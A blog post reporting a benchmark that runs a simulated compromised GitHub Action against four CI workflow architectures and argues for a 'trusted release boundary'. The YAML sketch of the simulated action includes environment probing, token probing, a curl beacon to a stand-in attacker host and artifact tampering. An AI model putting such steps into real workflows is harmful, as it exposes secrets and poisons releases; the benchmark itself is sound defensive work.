Your AI Agent Will Make CI Supply-Chain Defense Either Too Weak or Too Expensive

SHA pinning wasn't enough. Enterprise hardening was too much. So I built a benchmark.

When tj-actions/changed-files was compromised, the advice spread fast: pin your SHAs, reduce token permissions, review your workflows.

That advice was not wrong. It was just incomplete.

What kept bothering me was this: pinning only helps if the thing you pinned is not already malicious. If the pinned code is the attack, or the compromised version is exactly what your workflow is using, then SHA pinning gives you determinism, not safety.

That turned into a bigger frustration I kept seeing in practice, especially when AI coding agents started generating CI security fixes.

You build a normal project. You are not trying to become a deep CI security specialist. Then the model suddenly proposes an enterprise-grade answer: hardened runners, attestation, egress controls, multiple extra jobs, maybe cloud federation, maybe more. Some people accept it, but the overhead is high. Some reject it immediately because the performance hit and operational burden feel too big. Then the "smart compromise" is to tell the AI to make the minimal secure fix, and it usually lands on the same answer: SHA pinning plus basic permission scoping.

That is better than nothing. It is also not enough.

So I wanted to find the missing middle: a solution stronger than the typical AI-generated "just pin the SHA" workflow, but much lighter than a full enterprise security stack. I wanted something that meaningfully changed the blast radius without adding significant cost.

The Question

What CI architecture actually contains a compromised action?

I did not want an opinion post. I wanted an experiment.

I built a reproducible benchmark that keeps the repository, source file, malicious action, and GitHub Actions platform constant. The only changing variable is the workflow architecture.

If the same malicious action runs against four different CI designs, which design actually stops the bad outcomes?

The Setup

The repo contains:

  • a tiny deterministic app
  • a fake deploy script
  • a local composite action that simulates a compromised third-party action

The app is intentionally trivial because I wanted the benchmark to measure CI trust boundaries, not application complexity.

The malicious action performs six behaviors:

  1. Environment variable dumping
  2. GITHUB_TOKEN permission probing
  3. Process memory access checks
  4. Outbound exfiltration attempts
  5. Artifact poisoning
  6. Source enumeration
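
To make those behaviors concrete, here is a minimal sketch of what a simulated action like this can look like as a local composite action. Everything here is illustrative, not the benchmark's actual code: the file layout, the sentinel domain, and the assumption that GITHUB_TOKEN is exposed to the step are mine.

```yaml
# .github/actions/compromised/action.yml (hypothetical sketch of the simulated action)
name: simulated-compromised-action
description: Benign probes that stand in for real attacker behavior
runs:
  using: composite
  steps:
    - name: Probe environment and token scope
      shell: bash
      run: |
        # behavior 1: environment dumping (records which variable NAMES are visible)
        env | cut -d= -f1 | sort > /tmp/env-names.txt
        # behavior 2: token probing (expects 403 when the token is properly scoped)
        curl -s -o /dev/null -w "%{http_code}\n" -X POST \
          -H "Authorization: Bearer ${GITHUB_TOKEN:-}" \
          "https://api.github.com/repos/${GITHUB_REPOSITORY}/releases" || true
    - name: Attempt exfiltration and artifact poisoning
      shell: bash
      run: |
        # behavior 4: outbound exfiltration attempt to a sentinel host
        curl -s --max-time 5 https://attacker.example.invalid/beacon || echo "egress blocked"
        # behavior 5: artifact poisoning, tampering with whatever is in the workspace
        echo "POISONED" >> dist/app || true
```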

I ran that same action against four workflow tiers.

Tier 1: No Security

This is the insecure baseline.

  • third-party code runs in the same job as deployment secrets
  • release happens from the same compromised workspace
  • the artifact upload happens after the malicious action can already modify it
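
To make the baseline concrete, here is a minimal sketch of this shape. The job, script, and secret names are illustrative, not the benchmark's actual files:

```yaml
# Hypothetical Tier 1 workflow: everything lives in one job
name: tier1-no-security
on: push
jobs:
  build-and-release:
    runs-on: ubuntu-latest
    env:
      DEPLOY_KEY: ${{ secrets.DEPLOY_KEY }}  # deployment secret shares the job with untrusted code
    steps:
      - uses: actions/checkout@v4            # floating tag, not pinned
      - uses: ./.github/actions/compromised  # stand-in for a compromised third-party action
      - run: ./scripts/build.sh              # builds in a workspace the action could already modify
      - run: ./scripts/deploy.sh             # releases from the same compromised job
```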

Tier 2: SHA-Pinned

This is the typical "minimal security fix" AI agents often suggest.

  • pin actions by SHA
  • reduce workflow permissions
  • keep the same workflow shape

This tier isolates what pinning and token scoping actually buy you when compromised code still executes in the trusted lane.
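
A sketch of the same job after the typical minimal fix, with the same illustrative names; the `<full-commit-sha>` placeholder stands in for a real 40-character commit hash:

```yaml
# Hypothetical Tier 2 workflow: pinned refs and scoped token, same single-job shape
name: tier2-sha-pinned
on: push
permissions:
  contents: read                             # token can no longer create releases
jobs:
  build-and-release:
    runs-on: ubuntu-latest
    env:
      DEPLOY_KEY: ${{ secrets.DEPLOY_KEY }}  # secret still visible to the compromised step
    steps:
      - uses: actions/checkout@<full-commit-sha>  # deterministic, but a pinned compromise still runs
      - uses: ./.github/actions/compromised
      - run: ./scripts/build.sh
      - run: ./scripts/deploy.sh             # artifact can still be poisoned before this point
```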

Tier 3: Trusted Release Boundary

This is the candidate solution.

  • the untrusted lane gets no deployment secrets
  • the trusted release lane is separate
  • outputs crossing the boundary are validated
  • the release lane runs on a fresh runner
  • the release lane rebuilds from source instead of consuming artifacts from the untrusted lane

This is the core idea I ended up calling the Trusted Release Boundary.
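
Here is a minimal sketch of the two-lane shape, under the same illustrative naming assumptions. Note that the untrusted output is passed through an environment variable before validation, which avoids a separate injection risk from interpolating it directly into the script:

```yaml
# Hypothetical Tier 3 workflow: untrusted lane has no secrets; trusted lane rebuilds from source
name: tier3-trusted-release-boundary
on: push
permissions:
  contents: read
jobs:
  untrusted:
    runs-on: ubuntu-latest                   # quarantine lane: no secrets, read-only token
    outputs:
      app_version: ${{ steps.meta.outputs.version }}
    steps:
      - uses: actions/checkout@<full-commit-sha>
      - uses: ./.github/actions/compromised  # the compromise happens here, inside quarantine
      - id: meta
        run: echo "version=$(cat VERSION)" >> "$GITHUB_OUTPUT"  # only metadata leaves this lane

  release:
    needs: untrusted
    runs-on: ubuntu-latest                   # fresh runner, separate workspace
    environment: release                     # deployment secrets are scoped to this lane only
    steps:
      - name: Validate boundary-crossing output
        env:
          APP_VERSION: ${{ needs.untrusted.outputs.app_version }}  # via env, never inlined
        run: |
          [[ "$APP_VERSION" =~ ^[0-9]+\.[0-9]+\.[0-9]+$ ]] \
            || { echo "rejected untrusted output"; exit 1; }
      - uses: actions/checkout@<full-commit-sha>
      - run: ./scripts/build.sh              # rebuild from source, never from untrusted artifacts
      - run: ./scripts/deploy.sh
```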

Tier 4: Enterprise

This keeps the Tier 3 boundary model and adds stronger controls:

  • hardened runner with egress blocking
  • artifact attestation
  • more operational complexity

This is the upper-bound comparison, not the target solution for most teams.
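
A sketch of what the additions might look like, assuming the widely used step-security/harden-runner and actions/attest-build-provenance actions; the benchmark's actual configuration may differ:

```yaml
# Hypothetical Tier 4 additions; the Tier 3 boundary is retained, only new controls shown
jobs:
  untrusted:
    runs-on: ubuntu-latest
    steps:
      - uses: step-security/harden-runner@<full-commit-sha>
        with:
          egress-policy: block               # outbound exfiltration attempts now fail
          allowed-endpoints: >
            github.com:443
            api.github.com:443
      # ...checkout and the compromised action follow, as in Tier 3

  release:
    needs: untrusted
    runs-on: ubuntu-latest
    permissions:
      id-token: write                        # needed to sign the provenance
      attestations: write
      contents: read
    steps:
      # ...validate, checkout, rebuild as in Tier 3, then:
      - uses: actions/attest-build-provenance@<full-commit-sha>
        with:
          subject-path: dist/app             # hypothetical artifact path
```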

Full repo:

https://github.com/AlphaSudo/sbtr-benchmark

The Results

Here is the final score table:

Tier | Architecture                       | Score  | Annual Cost
-----|------------------------------------|--------|--------------------------
1    | No security                        | 10/100 | $0
2    | SHA-pinned                         | 20/100 | $0
3    | Trusted Release Boundary           | 75/100 | $0
4    | Enterprise (egress + attestation)  | 83/100 | enterprise-style overhead

The exact score matters less than the shape of the jump.

(Figure: benchmark comparison table)

Tier 1

Tier 1 got owned exactly the way you would expect:

  • secrets were accessible in the same job
  • the token could create releases
  • outbound exfiltration worked
  • the artifact was poisoned and shipped

This is full CI trust collapse.

Tier 2

Tier 2 improved one thing: token abuse. The workflow token could no longer create releases.

But almost everything else stayed bad:

  • the malicious action still saw secrets
  • outbound exfiltration still worked
  • the artifact was still poisoned and shipped

This is the point of the benchmark. SHA pinning did not fail because pinning is useless. It failed because pinning is not a containment strategy. It protects against mutable references and update drift. It does not protect you when the pinned version is already compromised.

(Figure: Tier 2 security metrics)

Tier 3

Tier 3 is where the architecture changes the outcome.

The malicious action still runs, but:

  • the untrusted lane has no deployment secrets
  • the token is not write-capable in any meaningful release sense
  • outputs cross a validation gate
  • the trusted lane rebuilds from source on a fresh runner
  • the shipped artifact is clean

This is the key result. The malicious action still executes, but it cannot meaningfully corrupt the release path because it never enters the trusted release domain.

(Figure: Tier 3 security metrics)

Tier 4

Tier 4 was strongest overall:

  • no secrets in the untrusted lane
  • outbound exfiltration blocked
  • validation gate present
  • clean artifact rebuilt from source
  • successful provenance attestation

This tier also taught a useful lesson. The first attestation attempt failed because the hardened egress policy was too strict and blocked Sigstore endpoints. After allowing fulcio.sigstore.dev and rekor.sigstore.dev, the release succeeded.

That is the reality of enterprise controls: they can be very strong, but they also increase the operational tuning burden.
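
Concretely, with a harden-runner-style egress policy, the fix is roughly an allowlist widening like this (illustrative, not the benchmark's exact config):

```yaml
- uses: step-security/harden-runner@<full-commit-sha>
  with:
    egress-policy: block
    allowed-endpoints: >
      github.com:443
      api.github.com:443
      fulcio.sigstore.dev:443                # Sigstore certificate authority for signing
      rekor.sigstore.dev:443                 # Sigstore transparency log
```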

The Climax: Artifact Integrity

The most convincing proof in the benchmark was not the secret count. It was the artifact result.

  • Tier 1 shipped a poisoned artifact
  • Tier 2 shipped a poisoned artifact
  • Tier 3 shipped a clean artifact
  • Tier 4 shipped a clean artifact

Same repository. Same source file. Same malicious action. Same platform.

The variable was architecture.

That is the point where this stops being theoretical. If an attacker can modify the artifact you ship, then the debate about whether a workflow "looked secure" is over.

(Figure: artifact integrity proof)

The Framework

The benchmark converged on a six-rule model:

Rule | Name                | Purpose
-----|---------------------|------------------------------------------------------------
0    | PIN                 | Immutable SHA references for all external actions
1    | QUARANTINE          | Untrusted lane gets no secrets and no write authority
2    | ISOLATE             | Trusted lane is separate and first-party only
3    | REBUILD             | Trusted lane rebuilds from source on a fresh runner
4    | ARTIFACT QUARANTINE | Only metadata crosses the boundary, never untrusted binaries
5    | VALIDATE            | Outputs crossing the boundary are explicitly sanitized

Why this matters:

  • PIN is still necessary, but it is not the whole answer
  • QUARANTINE and ISOLATE stop same-job trust collapse
  • REBUILD and ARTIFACT QUARANTINE stop poisoned binaries from riding the release path
  • VALIDATE closes the quieter gap where untrusted outputs become trusted control inputs
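
As a compact illustration of ARTIFACT QUARANTINE and VALIDATE working together: only metadata crosses the boundary, and even that is shape-checked before use. This is a hypothetical sketch, not the benchmark's code:

```yaml
# Only a hash crosses the boundary, and the hash itself is validated before use
jobs:
  untrusted:
    runs-on: ubuntu-latest
    outputs:
      reported_sha: ${{ steps.hash.outputs.sha }}
    steps:
      # ...build happens here, possibly tainted...
      - id: hash
        run: echo "sha=$(sha256sum dist/app | cut -d' ' -f1)" >> "$GITHUB_OUTPUT"

  release:
    needs: untrusted
    runs-on: ubuntu-latest
    steps:
      - name: Validate before trusting
        env:
          REPORTED_SHA: ${{ needs.untrusted.outputs.reported_sha }}
        run: |
          # reject anything that is not exactly a 64-character hex digest
          [[ "$REPORTED_SHA" =~ ^[0-9a-f]{64}$ ]] || exit 1
          # the value is advisory only: the release still ships its own rebuild
```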

That combination is what makes Tier 3 work.

And that is why I think this is a useful practical framework: it gives teams a real middle path:

  • stronger than "just pin the SHA"
  • far lighter than "full enterprise security stack"

Honest Limitations

A few caveats matter.

First, this benchmark repo is public. That means source exposure is less severe than it would be in a private repository.

Second, the malicious action is simulated. It is designed to be reproducible, not stealthy. A real attacker would likely be quieter.

Third, there was a line-ending caveat. Local Windows hashing used CRLF, while GitHub-hosted Linux runners built artifacts from LF checkouts. So clean artifact comparisons had to be anchored to the normalized Linux source hash.
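
A simple way to sidestep this, sketched here with a hypothetical source path, is to hash a normalized form of the file on every platform:

```yaml
- name: Compute normalized source hash
  shell: bash
  run: |
    # strip CR so CRLF (Windows) and LF (Linux) checkouts hash identically
    tr -d '\r' < src/app.py | sha256sum | cut -d' ' -f1
```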

Fourth, Tier 3 still leaves outbound network access open. That is one reason Tier 4 scores higher. The Trusted Release Boundary is the biggest low-cost jump, not the final possible hardening state.

Why I Think This Matters

What I wanted out of this project was not a perfect security architecture for every team. I wanted a better answer to a very common failure mode:

someone wants more than SHA pinning, but does not want enterprise-grade overhead.

That is exactly where a lot of real teams live.

They are not ignoring security. They just cannot justify a dramatic performance hit, a large operations burden, or a full platform-engineering project because an AI assistant suggested the maximum possible hardening pattern.

The benchmark result suggests there is a much better default answer:

build a trusted release boundary.

That is the smallest change in this experiment that materially changed the attack outcome.

Try To Break It

If you want to reproduce the benchmark, the repository includes the workflows, malicious action, evidence, and reproduction guide.

I genuinely want feedback on where this model breaks, where the validation boundary is too weak, or where the assumptions stop holding under more realistic CI environments.

Because the goal here is not to claim "problem solved."

The goal is to offer a better alternative than:

  • overkill enterprise security that many teams will reject
  • minimal SHA-only hardening that still leaves the release path too exposed

If that middle path is useful, then this benchmark did its job.

If you've seen CI patterns that break this model, leave them in the comments. I'm especially interested in where Tier 3 fails in real-world workflows.
